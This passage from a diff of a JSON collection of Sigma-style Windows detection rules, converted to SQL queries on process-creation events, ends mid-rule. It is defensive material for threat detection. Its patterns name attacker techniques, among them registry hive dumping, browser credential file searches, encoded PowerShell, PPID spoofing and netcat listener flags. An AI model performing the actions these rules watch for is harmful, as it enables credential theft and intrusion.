"Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%OjpGcm9tQmFzZTY0U3RyaW5n%' ESCAPE '\\' OR CommandLine LIKE '%o6RnJvbUJhc2U2NFN0cmluZ%' ESCAPE '\\' OR CommandLine LIKE '%6OkZyb21CYXNlNjRTdHJpbm%' ESCAPE '\\' OR (CommandLine LIKE '%OgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcA%' ESCAPE '\\' OR CommandLine LIKE '%oAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZw%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\git.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\git-remote-https.exe' ESCAPE '\\') OR OriginalFileName = 'git.exe') AND (CommandLine LIKE '% clone %' ESCAPE '\\' OR CommandLine LIKE '%git-remote-https %' ESCAPE '\\') AND (CommandLine LIKE '%exploit%' ESCAPE '\\' OR CommandLine LIKE '%Vulns%' ESCAPE '\\' OR CommandLine LIKE '%vulnerability%' ESCAPE '\\' OR CommandLine LIKE '%RemoteCodeExecution%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%CVE-%' ESCAPE '\\' OR CommandLine LIKE '%poc-%' ESCAPE '\\' OR CommandLine LIKE '%ProofOfConcept%' ESCAPE '\\' OR CommandLine LIKE '%proxyshell%' ESCAPE '\\' OR CommandLine LIKE '%log4shell%' ESCAPE '\\' OR CommandLine LIKE '%eternalblue%' ESCAPE '\\' OR CommandLine LIKE '%eternal-blue%' ESCAPE '\\' OR CommandLine LIKE '%MS17-%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_base64_frombase64string.yml" + "filename": "proc_creation_win_git_susp_clone.yml" }, { - "title": "PUA - Mouse Lock Execution", - "id": "c9192ad9-75e5-43eb-8647-82a0a5b493e3", + "title": "Verclsid.exe Runs COM Object", + "id": "d06be4b9-8045-428b-a567-740a26d9db25", "status": "test", - "description": "In Kaspersky's 2020 Incident Response Analyst Report they listed legitimate tool \"Mouse Lock\" as being used for both credential access and collection in security incidents.", - "author": "Cian Heasley", + "description": "Detects when verclsid.exe is used to run COM object via GUID", + "author": "Victor Sergeev, oscd.community", "tags": [ - "attack.credential_access", - "attack.collection", - "attack.t1056.002" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Legitimate uses of Mouse Lock software" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product LIKE '%Mouse Lock%' ESCAPE '\\' OR Company LIKE '%Misc314%' ESCAPE '\\' OR CommandLine LIKE '%Mouse Lock\\_%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR OriginalFileName = 'verclsid.exe') AND (CommandLine LIKE '%/S%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_mouselock_execution.yml" + "filename": "proc_creation_win_verclsid_runs_com.yml" }, { - "title": "APT27 - Emissary Panda Activity", - "id": "9aa01d62-7667-4d3b-acb8-8cb5103e2014", - "status": "test", - "description": "Detects the execution of DLL side-loading malware used by threat group Emissary Panda aka APT27", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential File Overwrite Via Sysinternals SDelete", + "id": "a4824fca-976f-4964-b334-0621379e84c4", + "status": "experimental", + "description": "Detects the use of SDelete to erase a file not the free space", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.g0027" + "attack.impact", + "attack.t1485" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\sllauncher.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND CommandLine LIKE '%-k%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'sdelete.exe' AND NOT ((CommandLine LIKE '% -h%' ESCAPE '\\' OR CommandLine LIKE '% -c%' ESCAPE '\\' OR CommandLine LIKE '% -z%' ESCAPE '\\' OR CommandLine LIKE '% /\\?%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_apt27_emissary_panda.yml" + "filename": "proc_creation_win_sysinternals_sdelete.yml" }, { - "title": "WinDbg/CDB LOLBIN Usage", - "id": "b5c7395f-e501-4a08-94d4-57fe7a9da9d2", - "status": "test", - "description": "Detects usage of \"cdb.exe\" to launch 64-bit shellcode or arbitrary processes or commands from a debugger script file", - "author": "Beyu Denis, oscd.community, Nasreddine Bencherchali", + "title": "SyncAppvPublishingServer Execute Arbitrary PowerShell Code", + "id": "fbd7c32d-db2a-4418-b92c-566eb8911133", + "status": "experimental", + "description": "Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe.", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1106", "attack.defense_evasion", - "attack.t1218", - "attack.t1127" + "attack.t1218" ], "falsepositives": [ - "Legitimate use of debugging tools" + "App-V clients" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cdb.exe' ESCAPE '\\' OR OriginalFileName = 'CDB.Exe') AND (CommandLine LIKE '% -c %' ESCAPE '\\' OR CommandLine LIKE '% -cf %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SyncAppvPublishingServer.exe' ESCAPE '\\' OR OriginalFileName = 'syncappvpublishingserver.exe') AND CommandLine LIKE '%\"n; %' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_cdb.yml" + "filename": "proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml" }, { - "title": "Webshell Recon Detection Via CommandLine & Processes", - "id": "f64e5c19-879c-4bae-b471-6d84c8339677", - "status": "test", - "description": "Detects processes spawned from web servers (php, tomcat, iis...etc) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands", - "author": "Cian Heasley, Florian Roth", + "title": "Suspicious PowerShell Encoded Command Patterns", + "id": "b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c", + "status": "experimental", + "description": "Detects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1505.003" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Other tools that work with encoded scripts in the command line instead of script files" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentProcessName LIKE '%-tomcat-%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND (CommandLine LIKE '%perl --help%' ESCAPE '\\' OR CommandLine LIKE '%python --help%' ESCAPE '\\' OR CommandLine LIKE '%python -h%' ESCAPE '\\' OR CommandLine LIKE '%python3 --help%' ESCAPE '\\' OR CommandLine LIKE '%python3 -h%' ESCAPE '\\' OR CommandLine LIKE '%wget --help%' ESCAPE '\\' OR CommandLine LIKE '%perl -h%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.Exe', 'pwsh.dll')) AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -enco%' ESCAPE '\\') AND (CommandLine LIKE '% JAB%' ESCAPE '\\' OR CommandLine LIKE '% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% IAB%' ESCAPE '\\' OR CommandLine LIKE '% PAA%' ESCAPE '\\' OR CommandLine LIKE '% aQBlAHgA%' ESCAPE '\\')) AND NOT (((ParentProcessName LIKE '%C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\gc\\_worker.exe%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_webshell_recon_detection.yml" + "filename": "proc_creation_win_powershell_encoded_cmd_patterns.yml" }, { - "title": "Potential CVE-2021-26857 Exploitation Attempt", - "id": "cd479ccc-d8f0-4c66-ba7d-e06286f3f887", - "status": "stable", - "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26857 by looking for | abnormal subprocesses spawning by Exchange Server's Unified Messaging service", - "author": "Bhabesh Raj", + "title": "Suspicious Where Execution", + "id": "725a9768-0f5e-4cb3-aec2-bc5719c6831a", + "status": "experimental", + "description": "Adversaries may enumerate browser bookmarks to learn more about compromised hosts.\nBrowser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about\ninternal network resources such as servers, tools/dashboards, or other related infrastructure.\n", + "author": "frack113, Nasreddine Bencherchali", "tags": [ - "attack.t1203", - "attack.execution", - "cve.2021.26857" + "attack.discovery", + "attack.t1217" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\UMWorkerProcess.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%wermgr.exe' ESCAPE '\\' OR NewProcessName LIKE '%WerFault.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\where.exe' ESCAPE '\\' OR OriginalFileName = 'where.exe') AND (CommandLine LIKE '%places.sqlite%' ESCAPE '\\' OR CommandLine LIKE '%cookies.sqlite%' ESCAPE '\\' OR CommandLine LIKE '%formhistory.sqlite%' ESCAPE '\\' OR CommandLine LIKE '%logins.json%' ESCAPE '\\' OR CommandLine LIKE '%key4.db%' ESCAPE '\\' OR CommandLine LIKE '%key3.db%' ESCAPE '\\' OR CommandLine LIKE '%sessionstore.jsonlz4%' ESCAPE '\\' OR CommandLine LIKE '%History%' ESCAPE '\\' OR CommandLine LIKE '%Bookmarks%' ESCAPE '\\' OR CommandLine LIKE '%Cookies%' ESCAPE '\\' OR CommandLine LIKE '%Login Data%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2021_26857_msexchange.yml" + "filename": "proc_creation_win_where_browser_data_recon.yml" }, { - "title": "Abusing Findstr for Defense Evasion", - "id": "bf6c39fc-e203-45b9-9538-05397c1b4f3f", - "status": "test", - "description": "Attackers can use findstr to hide their artifacts or search specific strings and evade defense mechanism", - "author": "Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali", + "title": "DLL Loaded via CertOC.EXE", + "id": "242301bc-f92f-4476-8718-78004a6efd9f", + "status": "experimental", + "description": "Detects when a user installs certificates by using CertOC.exe to loads the target DLL file.", + "author": "Austin Songer @austinsonger", "tags": [ "attack.defense_evasion", - "attack.t1218", - "attack.t1564.004", - "attack.t1552.001", - "attack.t1105" + "attack.t1218" ], "falsepositives": [ - "Administrative findstr usage" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%findstr%' ESCAPE '\\' OR NewProcessName LIKE '%findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND (((CommandLine LIKE '% /v %' ESCAPE '\\' OR CommandLine LIKE '% -v %' ESCAPE '\\') AND (CommandLine LIKE '% /l %' ESCAPE '\\' OR CommandLine LIKE '% -l %' ESCAPE '\\')) OR ((CommandLine LIKE '% /s %' ESCAPE '\\' OR CommandLine LIKE '% -s %' ESCAPE '\\') AND (CommandLine LIKE '% /i %' ESCAPE '\\' OR CommandLine LIKE '% -i %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND (CommandLine LIKE '% -LoadDLL %' ESCAPE '\\' OR CommandLine LIKE '% /LoadDLL %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_findstr.yml" + "filename": "proc_creation_win_certoc_load_dll.yml" }, { - "title": "Potential Rundll32 Execution With DLL Stored In ADS", - "id": "9248c7e1-2bf3-4661-a22c-600a8040b446", + "title": "Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE", + "id": "07f8bdc2-c9b3-472a-9817-5a670b872f53", "status": "experimental", - "description": "Detects execution of rundll32 where the DLL being called is stored in an Alternate Data Stream (ADS).", - "author": "Harjot Singh, '@cyb3rjy0t'", + "description": "Detects usage of cmdkey to look for cached credentials on the system", + "author": "jmallette, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564.004" + "attack.credential_access", + "attack.t1003.005" ], "falsepositives": [ - "Unknown" + "Legitimate administrative tasks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine REGEXP '[Rr][Uu][Nn][Dd][Ll][Ll]32(\\.[Ee][Xx][Ee])? \\S+?\\w:\\S+?:')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmdkey.exe' ESCAPE '\\' OR OriginalFileName = 'cmdkey.exe') AND (CommandLine LIKE '% /l%' ESCAPE '\\' OR CommandLine LIKE '% -l%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_ads_stored_dll_execution.yml" + "filename": "proc_creation_win_cmdkey_recon.yml" }, { - "title": "NtdllPipe Like Activity Execution", - "id": "bbc865e4-7fcd-45a6-8ff1-95ced28ec5b2", - "status": "test", - "description": "Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection. As seen being used in the POC NtdllPipe", + "title": "Suspicious GrpConv Execution", + "id": "f14e169e-9978-4c69-acb3-1cff8200bc36", + "status": "experimental", + "description": "Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.persistence", + "attack.t1547" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%type \\%windir\\%\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%type \\%systemroot\\%\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%type c:\\\\windows\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ntdll.dll > \\\\\\\\.\\\\pipe\\\\\\*' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%grpconv.exe -o%' ESCAPE '\\' OR CommandLine LIKE '%grpconv -o%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_ntdllpipe_redirect.yml" + "filename": "proc_creation_win_lolbin_susp_grpconv.yml" }, { - "title": "ShimCache Flush", - "id": "b0524451-19af-4efa-a46f-562a977f792e", - "status": "stable", - "description": "Detects actions that clear the local ShimCache and remove forensic evidence", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], + "title": "Execution of Powershell Script in Public Folder", + "id": "fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4", + "status": "experimental", + "description": "This rule detects execution of PowerShell scripts located in the \"C:\\Users\\Public\" folder", + "author": "Max Altgelt (Nextron Systems)", "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%apphelp.dll%' ESCAPE '\\' AND (CommandLine LIKE '%ShimFlushCache%' ESCAPE '\\' OR CommandLine LIKE '%#250%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%kernel32.dll%' ESCAPE '\\' AND (CommandLine LIKE '%BaseFlushAppcompatCache%' ESCAPE '\\' OR CommandLine LIKE '%#46%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%-f C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-f \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-f \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-fi C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fi \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fi \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-fil C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fil \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fil \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-file C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-file \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-file \\%Public\\%%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_susp_shimcache_flush.yml" + "filename": "proc_creation_win_powershell_public_folder.yml" }, { - "title": "Renamed Vmnat.exe Execution", - "id": "7b4f794b-590a-4ad4-ba18-7964a2832205", + "title": "DLL Sideloading by Microsoft Defender", + "id": "7002aa10-b8d4-47ae-b5ba-51ab07e228b9", "status": "experimental", - "description": "Detects renamed vmnat.exe or portable version that can be used for DLL side-loading", - "author": "elhoim", + "description": "Detects execution of Microsoft Defender's CLI process (MpCmdRun.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", + "author": "Bhabesh Raj", "tags": [ "attack.defense_evasion", "attack.t1574.002" @@ -14675,1929 +14350,1873 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'vmnat.exe' AND NOT ((NewProcessName LIKE '%vmnat.exe' ESCAPE '\\')))" - ], - "filename": "proc_creation_win_renamed_vmnat.yml" - }, - { - "title": "Dumping of Sensitive Hives Via Reg.EXE", - "id": "fd877b94-9bb5-4191-bb25-d79cbd93c167", - "status": "test", - "description": "Detects the usage of \"reg.exe\" in order to dump sensitive registry hives, which includes SAM, SYSTEM and SECURITY", - "author": "Teymur Kheirkhabarov, Endgame, JHasenbusch, Daniil Yugoslavskiy, oscd.community, frack113", - "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "car.2013-07-001" - ], - "falsepositives": [ - "Dumping hives for legitimate purpouse i.e. backup or forensic investigation" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%save%' ESCAPE '\\' OR CommandLine LIKE '%export%' ESCAPE '\\' OR CommandLine LIKE '%ˢave%' ESCAPE '\\' OR CommandLine LIKE '%eˣport%' ESCAPE '\\') AND (CommandLine LIKE '%hklm%' ESCAPE '\\' OR CommandLine LIKE '%hk˪m%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_local\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_˪ocal\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_loca˪\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_˪oca˪\\_machine%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢystem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\syˢtem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢyˢtem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢecurity%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\winsxs\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MpCmdRun.exe%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_reg_dumping_sensitive_hives.yml" + "filename": "proc_creation_win_mpcmdrun_dll_sideload_defender.yml" }, { - "title": "Lazarus System Binary Masquerading", - "id": "3f7f5b0b-5b16-476c-a85f-ab477f6dd24b", + "title": "HackTool - PPID Spoofing SelectMyParent Tool Execution", + "id": "52ff7941-8211-46f9-84f8-9903efb7077d", "status": "test", - "description": "Detects binaries used by the Lazarus group which use system names but are executed and launched from non-default location", - "author": "Trent Liffick (@tliffick), Bartlomiej Czyz (@bczyz1)", + "description": "Detects the use of parent process ID spoofing tools like Didier Stevens tool SelectMyParent", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1036.005" + "attack.t1134.004" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msdtc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\gpsvc.exe' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SelectMyParent.exe' ESCAPE '\\' OR (CommandLine LIKE '%PPID-spoof%' ESCAPE '\\' OR CommandLine LIKE '%ppid\\_spoof%' ESCAPE '\\' OR CommandLine LIKE '%spoof-ppid%' ESCAPE '\\' OR CommandLine LIKE '%spoof\\_ppid%' ESCAPE '\\' OR CommandLine LIKE '%ppidspoof%' ESCAPE '\\' OR CommandLine LIKE '%spoofppid%' ESCAPE '\\' OR CommandLine LIKE '%spoofedppid%' ESCAPE '\\' OR CommandLine LIKE '% -spawnto %' ESCAPE '\\') OR (OriginalFileName LIKE '%PPID-spoof%' ESCAPE '\\' OR OriginalFileName LIKE '%ppid\\_spoof%' ESCAPE '\\' OR OriginalFileName LIKE '%spoof-ppid%' ESCAPE '\\' OR OriginalFileName LIKE '%spoof\\_ppid%' ESCAPE '\\' OR OriginalFileName LIKE '%ppidspoof%' ESCAPE '\\' OR OriginalFileName LIKE '%spoofppid%' ESCAPE '\\' OR OriginalFileName LIKE '%spoofedppid%' ESCAPE '\\') OR Description = 'SelectMyParent' OR Imphash IN ('04d974875bd225f00902b4cad9af3fbc', 'a782af154c9e743ddf3f3eb2b8f3d16e', '89059503d7fbf470e68f7e63313da3ad', 'ca28337632625c8281ab8a130b3d6bad') OR (Hashes LIKE '%IMPHASH=04D974875BD225F00902B4CAD9AF3FBC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A782AF154C9E743DDF3F3EB2B8F3D16E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89059503D7FBF470E68F7E63313DA3AD%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=CA28337632625C8281AB8A130B3D6BAD%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_lazarus_binary_masquerading.yml" + "filename": "proc_creation_win_hktl_selectmyparent.yml" }, { - "title": "HackTool - Bloodhound/Sharphound Execution", - "id": "f376c8a7-a2d0-4ddc-aa0c-16c17236d962", + "title": "Renamed SysInternals DebugView Execution", + "id": "cd764533-2e07-40d6-a718-cfeec7f2da7f", "status": "test", - "description": "Detects command line parameters used by Bloodhound and Sharphound hack tools", + "description": "Detects suspicious renamed SysInternals DebugView execution", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.001", - "attack.t1069.002", - "attack.execution", - "attack.t1059.001" + "attack.resource_development", + "attack.t1588.002" ], "falsepositives": [ - "Other programs that use these command line option and accepts an 'All' parameter" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((Product LIKE '%SharpHound%' ESCAPE '\\' OR Description LIKE '%SharpHound%' ESCAPE '\\' OR (Company LIKE '%SpecterOps%' ESCAPE '\\' OR Company LIKE '%evil corp%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\Bloodhound.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\SharpHound.exe%' ESCAPE '\\')) OR (CommandLine LIKE '% -CollectionMethod All %' ESCAPE '\\' OR CommandLine LIKE '% --CollectionMethods Session %' ESCAPE '\\' OR CommandLine LIKE '% --Loop --Loopduration %' ESCAPE '\\' OR CommandLine LIKE '% --PortScanTimeout %' ESCAPE '\\' OR CommandLine LIKE '%.exe -c All -d %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Bloodhound%' ESCAPE '\\' OR CommandLine LIKE '%Get-BloodHoundData%' ESCAPE '\\') OR (CommandLine LIKE '% -JsonFolder %' ESCAPE '\\' AND CommandLine LIKE '% -ZipFileName %' ESCAPE '\\') OR (CommandLine LIKE '% DCOnly %' ESCAPE '\\' AND CommandLine LIKE '% --NoSaveCache %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND Product = 'Sysinternals DebugView' AND NOT (OriginalFileName = 'Dbgview.exe' AND NewProcessName LIKE '%\\\\Dbgview.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_bloodhound_sharphound.yml" + "filename": "proc_creation_win_renamed_sysinternals_debugview.yml" }, { - "title": "PUA - Netcat Suspicious Execution", - "id": "e31033fc-33f0-4020-9a16-faf9b31cbf08", - "status": "experimental", - "description": "Detects execution of Netcat. Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", - "author": "frack113, Florian Roth (Nextron Systems)", + "title": "Curl.EXE Execution", + "id": "bbeaed61-1990-4773-bf57-b81dbad7db2d", + "status": "test", + "description": "Detects a curl process start on Windows, which could indicates a file download from a remote location or a simple web request to a remote server", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.command_and_control", - "attack.t1095" + "attack.t1105" ], "falsepositives": [ - "Legitimate ncat use" + "Scripts created by developers and admins", + "Administrative activity" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\nc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ncat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netcat.exe' ESCAPE '\\') OR (CommandLine LIKE '% -lvp %' ESCAPE '\\' OR CommandLine LIKE '% -lvnp%' ESCAPE '\\' OR CommandLine LIKE '% -l -v -p %' ESCAPE '\\' OR CommandLine LIKE '% -lv -p %' ESCAPE '\\' OR CommandLine LIKE '% -l --proxy-type http %' ESCAPE '\\' OR CommandLine LIKE '% -vnl 